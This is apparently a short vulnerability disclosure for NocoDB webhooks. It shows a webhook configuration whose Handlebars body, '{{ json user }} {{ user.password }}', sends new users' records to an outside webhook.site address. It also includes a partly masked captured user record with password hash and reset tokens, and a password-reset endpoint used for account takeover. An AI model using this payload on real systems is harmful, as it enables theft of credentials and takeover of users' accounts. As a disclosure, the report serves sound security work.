Through the webhook functionality, an attacker can use Handlebars expressions in the webhook body to capture sensitive user data.
This captures the email_verification_token; through the API I also found the PasswordForget function, which enables account takeover via password reset.
URL: "https://webhook.site/#!/XXXXXX"
METHOD: "POST"
EVENT: "After Insert"
BODY: "{{ json user }} {{ user.password }}"
{
"id": "us_******",
"email": "[email protected]",
"password": "$2a$10$wMm3MPZEyx.MYEC0*******",
"salt": "$2a$10$wMm3MP*******",
"firstname": null,
"lastname": null,
"username": null,
"refresh_token": "4fe1fbc72603a810f57db95b2a2********",
"invite_token": null,
"invite_token_expires": null,
"reset_password_expires": "2022-06-07T22:12:34.750Z",
"reset_password_token": "3175d930-4557-4d**************",
"email_verification_token": "716c8943-e4a7-************",
"email_verified": null,
"roles": "editor",
"created_at": "2022-06-07T19:31:30.670Z",
"updated_at": "2022-06-07T19:31:30.670Z",
"isAuthorized": true
}
Endpoint_final: "https://nocodb-xpl.herokuapp.com/api/v1/db/auth/password/reset/ + reset_password_token"
https://drive.google.com/file/d/1BLqcEHmPIE6sj9JeC6sCSEPB6dQVWXSk/view?usp=sharing